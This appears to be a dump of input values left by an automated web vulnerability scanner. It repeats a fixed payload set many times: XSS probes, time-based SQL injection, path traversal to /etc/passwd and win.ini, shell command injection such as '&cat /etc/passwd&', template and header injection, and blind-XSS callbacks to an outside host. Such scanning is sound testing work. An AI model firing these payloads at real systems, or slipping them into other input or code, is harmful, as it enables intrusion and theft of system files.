1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956128></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9000031*9578188)

1

1<ScRiPt >prompt(925481)</ScRiPt>

1

'+response.write(9000031*9578188)+'

1

1

1

1<video><source onerror="javascript:prompt(931945)">

"+response.write(9000031*9578188)+"

WEB-INF/web.xml

1

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991384)"></g></svg>

1

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<div style=width:expression(prompt(932488))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(961831)>

1

1

${99736+100259}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

if(now()=sysdate(),sleep(10.125),0)/*'XOR(if(now()=sysdate(),sleep(10.125),0))OR'"XOR(if(now()=sysdate(),sleep(10.125),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938729)>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1<img src=xyz OnErRor=prompt(915291)>

(select(0)from(select(sleep(10.125)))v)/*'+(select(0)from(select(sleep(10.125)))v)+'"+(select(0)from(select(sleep(10.125)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

1&n995837=v957131

-1

1<img/src=">" onerror=alert(985586)>

!(()&&!|*|*|

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

1<ScRiPt%20>prompt(972322)</sCripT>

1

-1)

^(#$!@#$)(()))******

'"()

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

"|"ld

1

1&lt

-1))

1

1

1

/etc/passwd

1

'

Fn7CNKaL'

1

<img acu onmouseover=prompt(985520) //>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

K8rsrf8m')

"

'

1

1<input autofocus onfocus=prompt(930560)>

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

PNj4iHqq'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitr9yFz6kIGO.bxss.me/

1

<a href='http://www.acunetix.com'>website security</a>

"

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

-1

1

1

1

................etc/passwd

comments

-1)

1

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

comments

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

&dir

comments/.

'"

1_hupHe <ScRiPt >prompt(953076)</ScRiPt>

1

1

1

file:///etc/passwd

'&dir&'

ueCqPsEJ'

1

1

<!--

1

1'"()&%<ScRiPt >prompt(922732)</ScRiPt>

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

ElHpb0iw')

1

'"()&%<ScRiPt >prompt(969701)</ScRiPt>

1

1

1

WEB-INF/web.xml

|dir

BA9wre79'))

1

1_916365

1

1

1

'|dir

1

1

WEB-INF\web.xml

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu6893<s1﹥s2ʺs3ʹuca6893

1

1

../../../../../../../../../../boot.ini

1

acux3605z1z2abcxuca3605

1<ScRiPt >prompt(921318)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(939999)</script>

1<ScRiPt >prompt(971045)</ScRiPt>

1

1

windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959249></ScRiPt>

1<ScRiPt >prompt(921338)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<video><source onerror="javascript:prompt(903086)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(909868)"></g></svg>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<div style=width:expression(prompt(928528))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9248397*9817514)

1

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

'+response.write(9248397*9817514)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949347)>

1

1

"+response.write(9248397*9817514)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979845)>

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(992080)>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(932342)>

1

1

WEB-INF\web.xml

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd

1

1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(923209)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99226+99640}

-1

1

1

1

1&lt

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

1

1&n949016=v973027

1

-1)

1

)

1

<img acu onmouseover=prompt(926884) //>

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(945684)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

'"()

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'

iSd5g4bw'

^(#$!@#$)(()))******

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"

oue5VtEe')

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

'

atY4RsbE')

${@print(md5(acunetix_wvs_security_test))}

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1_GGceQ <ScRiPt >prompt(914990)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

IZ38J2ia')

${@print(md5(acunetix_wvs_security_test))}\

1

1

/etc/passwd

1

1

acunetix_wvs_invalid_filename

W7ASM0uH'))

1

1

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitDQOdC0N6sU.bxss.me/

1

1

1

-1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

http://www.acunetix.tst

comments

1

1

'&dir&'

-1))

'"

1

................etc/passwd

1'"()&%<ScRiPt >prompt(943209)</ScRiPt>

comments/.

1

1

<!--

qMh5kpQ1'

1

'"()&%<ScRiPt >prompt(901781)</ScRiPt>

1

"&dir&"

1

K7Tw6eoV')

1

1_926468

1

1

|dir

file:///etc/passwd

1

3CyIfTWL'))

1

1

1

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

WEB-INF/web.xml

acu6826<s1﹥s2ʺs3ʹuca6826

1

1

1

WEB-INF\web.xml

1

acux7764z1z2abcxuca7764

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(959641)</ScRiPt>

1

1

1<script>prompt(989430)</script>

../../../../../../../../../../boot.ini

1

1

1

1

1<ScRiPt >prompt(924968)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953461></ScRiPt>

1

1

1

response.write(9001358*9815104)

................windowswin.ini

1<ScRiPt >prompt(918526)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

'+response.write(9001358*9815104)+'

1

1

1<video><source onerror="javascript:prompt(904251)">

"+response.write(9001358*9815104)+"

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950519)"></g></svg>

1

&cat /etc/passwd&

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(936391))>

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<body onload=prompt(958721)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960832)>

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

WEB-INF\web.xml

`cat /etc/passwd`

${100088+99557}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(960531)>

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(989009)>

-1

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(913635)</sCripT>

-1)

'|'ld

1&n954186=v963271

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'"()

!(()&&!|*|*|

testasp.vulnweb.com

"|"ld

1

orDZSHWb'

1

<img acu onmouseover=prompt(968616) //>

PX4MhIso')

1

^(#$!@#$)(()))******

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

92ViytGe'))

1

1<input autofocus onfocus=prompt(915981)>

'

1

1

1

'

/etc/passwd

1

1

-1

"

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1_Eu894 <ScRiPt >prompt(935695)</ScRiPt>

1

http://hitWDnF7OVn67.bxss.me/

1

1

................etc/passwd

&dir

1

hSSSLtRa'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

acunetix_wvs_invalid_filename

1

'&dir&'

1

http://www.acunetix.tst

1

sZalb0oL')

1

file:///etc/passwd

comments

'"

1

"&dir&"

1

1

1

1

OOkl7a3k'))

comments

<!--

|dir

1'"()&%<ScRiPt >prompt(983903)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

comments/.

1

'|dir

'"()&%<ScRiPt >prompt(923877)</ScRiPt>

WEB-INF/web.xml

1

1

1

"|dir

1_943102

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu3838<s1﹥s2ʺs3ʹuca3838

1

windowswin.ini

1

acux6014z1z2abcxuca6014

1

1

1<ScRiPt >prompt(990214)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(968746)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(921240)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908024></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(995707)</ScRiPt>

1

1

response.write(9579713*9398830)

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(978339)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9579713*9398830)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(923642)"></g></svg>

1

"+response.write(9579713*9398830)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1<div style=width:expression(prompt(949964))>

WEB-INF/web.xml

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

1<iframe src='data:text/html

WEB-INF\web.xml

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${99644+99181}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<body onload=prompt(903340)>

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n923159=v996540

1

|cat /etc/passwd#

1

1

1some_inexistent_file_with_long_name%00.jpg

)

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903737)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

!(()&&!|*|*|

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(932813)>

1

testasp.vulnweb.com

^(#$!@#$)(()))******

'"()

"|"ld

iVCJhU7s'

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1

1<img/src=">" onerror=alert(963819)>

1

1

1

1<ScRiPt%20>prompt(924107)</sCripT>

/etc/passwd

16kCihZR')

"

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1&lt

lSmRCgno'))

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

1

1

-1

${@print(md5(acunetix_wvs_security_test))}\

<img acu onmouseover=prompt(996785) //>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

acunetix_wvs_invalid_filename

-1)

http://hitPhlNvOzHWw.bxss.me/

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1<input autofocus onfocus=prompt(972713)>

................etc/passwd

||cat /etc/passwd

1

1

1

-1))

&dir

comments

1

<a href='http://www.acunetix.com'>website security</a>

1

1

M30FApT9'

http://www.acunetix.tst

comments/.

file:///etc/passwd

'&dir&'

'"

1'"()&%<ScRiPt >prompt(962763)</ScRiPt>

[url=http://www.acunetix.com]website security[/url]

1

1

imhMbWYv')

1

"&dir&"

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1_t2riW <ScRiPt >prompt(984617)</ScRiPt>

'"()&%<ScRiPt >prompt(930986)</ScRiPt>

1

nBbC6HBr'))

1

1

WEB-INF/web.xml

|dir

1

1

1

1

1

1_966156

1

WEB-INF\web.xml

1

1

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu2125<s1﹥s2ʺs3ʹuca2125

1

1

windowswin.ini

acux2456z1z2abcxuca2456

1

................windowswin.ini

1

1

1<ScRiPt >prompt(912879)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(959476)</script>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(963272)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912440></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(985218)</ScRiPt>

1

1<video><source onerror="javascript:prompt(926252)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959022)"></g></svg>

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(994004))>

1

1

WEB-INF\web.xml

response.write(9130926*9088585)

1

1<iframe src='data:text/html

1

1

'+response.write(9130926*9088585)+'

1

1

1<body onload=prompt(977957)>

&cat /etc/passwd&

1

1

"+response.write(9130926*9088585)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962137)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(907001)>

1

if(now()=sysdate(),sleep(17.594),0)/*'XOR(if(now()=sysdate(),sleep(17.594),0))OR'"XOR(if(now()=sysdate(),sleep(17.594),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<img/src=">" onerror=alert(946394)>

1

1

(select(0)from(select(sleep(17.594)))v)/*'+(select(0)from(select(sleep(17.594)))v)+'"+(select(0)from(select(sleep(17.594)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt%20>prompt(963717)</sCripT>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

1

1

-1

1

-1)

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1

1

-1))

${100218+99038}

1

<img acu onmouseover=prompt(946890) //>

../../../../../../../../../../etc/passwd.jpg

1

|cat /etc/passwd#

1

1

lmTWmmen'

1

1

1<input autofocus onfocus=prompt(905615)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

1&n931855=v941080

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

JBo7TOv0')

)

1

1some_inexistent_file_with_long_name%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

Bpb9d4tJ'))

"|"ld

1

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1

1_oGC7N <ScRiPt >prompt(975419)</ScRiPt>

'

1

testasp.vulnweb.com

-1)

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1

"

1

1

-1))

/etc/passwd

"

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

fdPX6YNo'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

382ExzJh')

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

http://hitIhupmJHHrD.bxss.me/

acunetix_wvs_invalid_filename

WJhEZYoW'))

1

1

1

1

................etc/passwd

'&dir&'

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

"&dir&"

comments

http://www.acunetix.tst

1

1

comments/.

'"

1

1

1

file:///etc/passwd

|dir

1

1

1'"()&%<ScRiPt >prompt(982613)</ScRiPt>

1

<!--

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(937701)</ScRiPt>

1

1

1

WEB-INF/web.xml

"|dir

1

1_937365

1

1

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acu6044<s1﹥s2ʺs3ʹuca6044

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux5709z1z2abcxuca5709

1

1

windowswin.ini

1<ScRiPt >prompt(924740)</ScRiPt>

1

1

1

1<script>prompt(903285)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(936467)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903431></ScRiPt>

1

1

1<ScRiPt >prompt(959198)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

response.write(9868485*9734854)

1<video><source onerror="javascript:prompt(944542)">

1

1

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976270)"></g></svg>

'+response.write(9868485*9734854)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(904132))>

1

"+response.write(9868485*9734854)+"

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(963751)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959898)>

WEB-INF/web.xml

1

1

${100275+100234}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

1

1<img src=xyz OnErRor=prompt(927563)>

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1<img/src=">" onerror=alert(947368)>

1&n973641=v920762

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

)

1

-1)

1<ScRiPt%20>prompt(941848)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1&lt

'"()

"|"ld

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'

1

rWSOwj3u'

1

<img acu onmouseover=prompt(989591) //>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

HZYycPHY')

1

1

"

1

1<input autofocus onfocus=prompt(938750)>

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

bfPdTxSz'))

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1

1

/etc/passwd

"

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitVvEkWaqt3M.bxss.me/

acunetix_wvs_invalid_filename

1

1_Eqwjz <ScRiPt >prompt(945198)</ScRiPt>

-1)

1

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

comments

-1))

1

1

1

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://www.acunetix.tst

comments

K4xCyhAK'

1

'"

1

'&dir&'

1'"()&%<ScRiPt >prompt(907275)</ScRiPt>

1

comments/.

B0bA5bAW')

'"()&%<ScRiPt >prompt(997403)</ScRiPt>

................etc/passwd

1

<!--

"&dir&"

1

1

1

1

f9zxj78o'))

1_979595

|dir

1

1

1

1

1

1

1

'|dir

file:///etc/passwd

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

acu7861<s1﹥s2ʺs3ʹuca7861

1

1

WEB-INF/web.xml

1

acux2299z1z2abcxuca2299

1

1

WEB-INF\web.xml

1<ScRiPt >prompt(910639)</ScRiPt>

1

1

1

1<script>prompt(950239)</script>

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(961712)</ScRiPt>

../../../../../../../../../../boot.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945771></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(934988)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<video><source onerror="javascript:prompt(955486)">

1

1

windowswin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(941779)"></g></svg>

1

1

response.write(9781127*9124509)

1

1

................windowswin.ini

1

1<div style=width:expression(prompt(947945))>

'+response.write(9781127*9124509)+'

1

1

&cat /etc/passwd&

"+response.write(9781127*9124509)+"

1

1

1<iframe src='data:text/html

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(955474)>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

/.\./.\./.\./.\./.\./.\./windows/win.ini

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918662)>

1

1

cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

${99364+100258}

1

1

1<img src=xyz OnErRor=prompt(917930)>

`cat /etc/passwd`

1

1

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(924228)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n972704=v973110

1

1<ScRiPt%20>prompt(981087)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

WEB-INF/web.xml

1&lt

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

'"()

MNiNKaeu'

1

testasp.vulnweb.com

"|"ld

<img acu onmouseover=prompt(927591) //>

WEB-INF\web.xml

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

xcruDrFD')

1

'

1<input autofocus onfocus=prompt(991561)>

1

1

1

1

1

FcAPxNOq'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

<a href='http://www.acunetix.com'>website security</a>

"

1

1

http://hitpclQeKumR3.bxss.me/

1

-1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

-1)

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1_vR5o1 <ScRiPt >prompt(959269)</ScRiPt>

................etc/passwd

1

1

1

-1))

||cat /etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

1

JgavP26W'

1

comments

&dir

zkTXqhay')

